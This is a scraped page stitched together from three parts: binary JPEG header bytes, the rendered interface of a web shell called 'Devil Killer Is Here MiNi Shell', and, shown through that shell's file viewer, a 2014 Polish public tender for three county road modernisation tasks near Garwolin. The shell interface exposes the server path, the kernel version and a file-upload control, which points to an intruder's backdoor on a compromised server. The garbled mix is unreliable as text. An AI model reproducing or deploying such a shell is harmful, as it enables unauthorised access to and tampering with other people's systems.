JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140512/159168-N-2014.html

<p class="kh_header"><b>Wola Rębkowska: Modernizacja drogi powiatowej Nr 1354W (Paprotnia) - Zadanie I
 Przebudowa drogi powiatowej Nr 1337W - Zadanie II
 Przebudowa drogi powiatowej Nr 1343W  - Zadanie III</b><br>
<b>Numer ogłoszenia: 159168 - 2014; data zamieszczenia: 12.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Garwolinie , ul. Przemysłowa 45, 08-410 Wola Rębkowska, woj. mazowieckie, tel. 025 6822215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdgarwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja drogi powiatowej Nr 1354W (Paprotnia) - Zadanie I
 Przebudowa drogi powiatowej Nr 1337W - Zadanie II
 Przebudowa drogi powiatowej Nr 1343W  - Zadanie III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje; Modernizacja drogi powiatowej Nr 1354W (Paprotnia) - gr. woj. - Mościska - Wola Życka - Kozice - Trojanów w km 10+067 ÷ 11+831 - Zadanie I, Przebudowa drogi powiatowej Nr 1337W Miastków Kościelny - Ryczyska - Gózdek w km 6+927 ÷ 7+127 - Zadanie II, Przebudowa drogi powiatowej Nr 1343W Gończyce - Chotynia - Wólka Ostrożeńska - Piastów w km 1+846 ÷ 2+536 -  Zadanie III

Zadanie I 
Zamówienie obejmuje wykonanie modernizacji drogi powiatowej Nr 1354W (Paprotnia) - gr. woj. - Mościska - Wola Życka - Kozice - Trojanów w km 10+067 ÷ 11+831.

Przebudowa drogi obejmuje:
NAWIERZCHNIA  
Mechaniczne oczyszczenie nawierzchni ulepszonej - bitum. w ilości 9702 m2
Skropienie nawierzchni drogowych emulsja asfaltową w ilości 6033,5 m2
Wyrównanie istniejącej nawierzchni betonem asfaltowym wg PN-EN, KR-2, wbudowanym mechanicznie w ilości 452,51Mg
Warstwa ścieralna nawierzchni wykonana z betonu asfaltowego wg PN-EN, KR-2, gr. w-wy po zagęszczeniu 3 cm w ilości 6033,5 m2
Powierzchniowe utrwalenie nawierzchni drogowych emulsją asfaltową przy użyciu grysu kamiennego frakcji 5-8, ilość kruszywa 8,0dm3/m2	 w ilości 3668,5 m2
POBOCZA  
Mechaniczne ścinanie poboczy o gr. 5 cm z załadunkiem i wywiezieniem na odl. do 1 km w ilości 3508 m2
Pobocza z kruszyw łamanych przy grubości warstwy po zagęszczeniu 10 cm w ilości 3508 m2

Zadanie II 
Zamówienie obejmuje wykonanie przebudowy drogi powiatowej Nr 1337W Miastków Kościelny - Ryczyska - Gózdek w km 6+927 ÷ 7+127

Przebudowa drogi obejmuje:
ODWODNIENIE
Oczyszczenie rowów z namułu z wyprofilowaniem skarp rowu, grubość namułu 30 cm	w ilości 400 m
Załadunek i wywóz gruntu kat. III z renowacji rowu na odkład na odl. do 1 km	w ilości 48 m3
NAWIERZCHNIA
Oczyszczenie nawierzchni ulepszonej bitumicznej  mechanicznie w ilości 1000m2
Skropienie warstw konstrukcyjnych emulsją asfaltową  w ilości 1000 m2
Wyrównanie istniejącej nawierzchni betonem asfaltowym wg PN-EN, KR-2 w ilości 50 Mg	
Warstwa ścieralna nawierzchni wykonana z betonu asfaltowego wg PN-EN, gr. w-wy 3 cm, KR-2 z uszczelnieniem złączy poprzecznych i podłużnych taśmą asfaltową w ilości 1000 m2	

POBOCZA
Uzupełnienie poboczy gruntem kat. III z dokopu z odl. do 1 km w ilości 15 m3
Transport gruntu na pobocza - za dalsze 4 km w ilości 15 m3
Mechaniczne profilowanie poboczy w ilości 300 m2
Mechaniczne zagęszczenie poboczy w ilości 300 m2
ZJAZDY GOSPODARCZE
Przepusty rurowe pod zjazdami - rury PEHD o średnicy 30 cm w ilości 36 m
Warstwa odsączająca, zagęszczanie mechaniczne, gr. w-wy po zagęszczeniu 20 cm w ilości 140,4 m2
Podbudowy z kruszyw łamanych przy grubości warstwy po zagęszczeniu 15 cm w ilości 140,4 m2

Zadanie III

Zamówienie obejmuje wykonanie przebudowy drogi powiatowej Nr 1343W Gończyce - Chotynia - Wólka Ostrożeńska - Piastów w km 1+846 ÷ 2+536.

Przebudowa drogi obejmuje:
NAWIERZCHNIA
Mechaniczne czyszczenie nawierzchni ulepszonej - bitum. w ilości 3450 m2
Wyrównanie istniejącej nawierzchni betonem asfaltowym wg PN-EN, KR-2 wbudowanym mechanicznie w ilości 258,75 Mg
Powierzchniowe utrwalenie nawierzchni drogowych emulsja asfaltową C69 B3 PU ( K1-70 ) i grysem kamiennym frakcji 2-5 w ilości 3450 m2

POBOCZA
Naprawy poboczy wykonywane mechanicznie - ścinanie o grubości 5 cm z zał. i wywiezieniem urobku na odkład na odl. do 1 km w ilości 1380 m2.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium dla zadania II i  zadania III
Zamawiający wymaga wniesienia wadium dla zadania I, w wysokości;
- 3 577,24zł (słownie: trzy tysiące pięćset siedemdziesiąt siedem złotych 24/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku wiedzy i doświadczenia Zamawiający uzna wykaz robót budowlanych, wykonanych w okresie ostatnich 5-ciu lat tj. 2009/2010/2011,2012,2013r. przed upływem terminu składania ofert, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), co najmniej 2 robót drogowych; 
- dla zadania I - (w tym; nawierzchnia, pobocza), o wartości nie mniejszej niż - 350 000,00zł, brutto każda); 
- dla zadania II - (w tym; odwodnienie, nawierzchnia, pobocza, zjazdy gospodarcze) - o wartości nie mniejszej niż -  50 000,00zł, brutto każda);
- dla zadania III - (w tym; nawierzchnia, pobocza), o wartości nie mniejszej niż -  80 000,00zł, brutto każda);

-  wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania (załącznik Nr 5) dla zadania I, II, III, oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania odpowiednim  potencjałem technicznym  do realizacji zamówienia, Zamawiający uzna, że Wykonawca  posiada lub będzie dysponował jednostkami sprzętu wraz z informacją o podstawie dysponowania tymi zasobami. przewidzianego do wykonania zamówienia - na załączonym formularzu - załącznik Nr 4 dla zadania I - zgodnie z wyszczególnieniem w punkcie 5.3. Instrukcji dla Wykonawców; * Wytwórnia mas bitumicznych  o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek  mineralno-asfaltowych- szt. 1 (dopuszcza się zakup mieszanki mineralno-asfaltowej, w tym przypadku należy podać źródło zakupu),  Układarka do mas bitumicznych z automatycznym sterowaniem i podgrzewaną deską - typu zagęszczającego -szt.- 1, Walec ogumiony z regulacją ciśnienia kół oraz fartuchem osłonowym - szt. 1, Walce stalowe 8- l0 Mg i 11-14 Mg - szt. 1+1, Urządzenie do oczyszczania nawierzchni - szt. 1, Samochody samowyładowcze z przykryciem w czasie transportu i podczas oczekiwania na rozładunek - w ilości zapewniającej ciągłość robót , Skrapiarka samochodowa z urządzeniem do mechanicznego sterowania i dozowania lepiszcza - szt. 1, koparko-ładowarka - szt. 1, równiarka - szt.1, rozsypywacz grysów doczepny szt. - 1, ścinarka poboczy samojezdna szt - 1, szczotka mechaniczna szt. - 1, załącznik Nr 4 dla zadania II - zgodnie z wyszczególnieniem w punkcie 5.3. Instrukcji dla Wykonawców; * Wytwórnia mas bitumicznych  o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek  mineralno-asfaltowych- szt. 1 (dopuszcza się zakup mieszanki mineralno-asfaltowej, w tym przypadku należy podać źródło zakupu),  Układarka do mas bitumicznych z automatycznym sterowaniem i podgrzewaną deską - typu zagęszczającego -szt1, Walec ogumiony z regulacją ciśnienia kół oraz fartuchem osłonowym - szt. 1, Walce stalowe 8- l0 Mg i 11-14 Mg - szt. 1+1, Urządzenie do oczyszczania nawierzchni - szt. 1, Samochody samowyładowcze z przykryciem w czasie transportu i podczas oczekiwania na rozładunek - w ilości zapewniającej ciągłość robót, żuraw samochodowy szt -1, skrapiarka samochodowa z urządzeniem do mechanicznego sterowania i dozowania lepiszcza - szt. 1,  równiarka - szt.1,  koparko-ładowarka - szt. 1, ciągnik kołowy - szt. 1, szczotka mechaniczna szt. - 1

załącznik Nr 4 dla zadania III - zgodnie z wyszczególnieniem w punkcie 5.3. Instrukcji dla Wykonawców; * Wytwórnia mas bitumicznych  o mieszaniu cyklicznym lub ciągłym do wytwarzania mieszanek  mineralno-asfaltowych- szt. 1 (dopuszcza się zakup mieszanki mineralno-asfaltowej, w tym przypadku należy podać źródło zakupu),  Układarka do mas bitumicznych z automatycznym sterowaniem i podgrzewaną deską - typu zagęszczającego -szt1, Walec ogumiony z regulacją ciśnienia kół oraz fartuchem osłonowym - szt. 1, Walce stalowe 8- l0 Mg i 11-14 Mg - szt. 1+1, Urządzenie do oczyszczania nawierzchni - szt. 1, Samochody samowyładowcze z przykryciem w czasie transportu i podczas oczekiwania na rozładunek - w ilości zapewniającej ciągłość robót, skrapiarka samochodowa z urządzeniem do mechanicznego sterowania i dozowania lepiszcza - szt. 1, równiarka- szt. 1,  koparko-ładowarka - szt. 1,- szt.1,  rozsypywacz grysów doczepny - szt. 1, ścinarka poboczy szt-1, szczotka mechaniczna szt. - 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania osobami zdolnymi do wykonywania zamówienia, Zamawiający uzna dysponowanie osobami; - Kierownik robót posiadający uprawnienia budowlane do kierowania robotami drogowymi (minimum jedna osoba), laborant (minimum jedna osoba), majster robót bitumicznych   (minimum jedna osoba), operator układarki, (minimum jedna osoba),  operator walca (minimum dwie osoby), urządzenia do czyszczenia nawierzchni (minimum jedna osoba), operator skrapiarki, (minimum jedna osoba), operator  koparko-ładowarki, (minimum jedna osoba), operator równiarki (minimum jedna osoba), operator rozsypywacza grysów doczepny (minimum jedna osoba), operator ścinarki poboczy (minimum jedna osoba), operator szczotki mechanicznej (minimum jedna osoba),  - załącznik Nr 3, dla zadania I, - wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
- Kierownik robót posiadający uprawnienia budowlane do kierowania robotami drogowymi (minimum jedna osoba), laborant (minimum jedna osoba), majster robót bitumicznych   (minimum jedna osoba), operator układarki, (minimum jedna osoba),  operator walca (minimum dwie osoby), urządzenia do czyszczenia nawierzchni (minimum jedna osoba), operator żurawia samochodowego (minimum jedna osoba), operator skrapiarki, (minimum jedna osoba),  operator równiarki (minimum jedna osoba), operator  koparko-ładowarki, (minimum jedna osoba), operator ciągnika kołowego  (minimum jedna osoba), operator szczotki mechanicznej (minimum jedna osoba) - załącznik Nr 3, dla zadania II -  wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.   
- Kierownik robót posiadający uprawnienia budowlane do kierowania robotami drogowymi (minimum jedna osoba), laborant (minimum jedna osoba), majster robót bitumicznych   (minimum jedna osoba), operator układarki, (minimum jedna osoba),  operator walca (minimum dwie osoby), operator urządzenia do czyszczenia nawierzchni (minimum jedna osoba), operator skrapiarki, (minimum jedna osoba), operator równiarki (minimum jedna osoba) operator koparko-ładowarki, (minimum jedna osoba), operator rozsypywacza grysów samojezdny (minimum jedna osoba),  operator ścinarki poboczy (minimum jedna osoba),  operator szczotki mechanicznej (minimum jedna osoba),  - załącznik Nr 3, dla zadania III - wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej, Zamawiający uzna oświadczenie, że Wykonawca dysponuje środkami finansowymi w kwocie  - dla zadania I - droga Nr 1354W - 370 000,00zł, dla zadania II - droga Nr 1337W - 70 000,00zl, dla zadania III - droga Nr 1343W - 100 000,00zł,  - niezbędnymi do wykonania zamówienia (na załączniku Nr 2) dla zadania I, II, III 
2. posiadanie  opłaconej polisy  opiewającej na kwotę 50 000,00  lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty dla zadania I, II, III, wypełniony kosztorys ofertowy dla zadania I, II, III, , wykaz podmiotów, które będą uczestniczyć w wykonaniu zamówienia jako podwykonawcy wraz z podaniem ich nazw, a także zakresu wykonywanych przez nich czynności - załącznik nr 6 SIWZ dla zadania I, II, III,  oświadczenie, że Wykonawca dysponuje środkami finansowymi w kwocie - dla zadania I - droga Nr 1354W - 370 000,00zł, dla zadania II - droga Nr 1337W - 70 000,00zl, dla zadania III - droga Nr 1343W - 100 000,00zł, - niezbędnymi do wykonania zamówienia (na załączniku Nr 2) SIWZ dla zadania I, II, III,  pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia gdy wykonawca sam nie dysponuje takim potencjałem, , wykaz posiadanego sprzętu laboratoryjnego, a w przypadku braku własnego laboratorium należy podać laboratorium,  które będzie obsługiwało zamówienie dla zadania I, II, III,  kopia dokumentu wadialnego dla zadania I,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdgarwolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Garwolinie  ul. Przemysłowa 45,  08-410  Wola Rębkowska, pokój nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2014 godzina 09:30, miejsce: Powiatowy Zarząd Dróg w Garwolinie ul. Przemysłowa 45,  08-410  Wola Rębkowska,  pokój nr 3  tj. sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





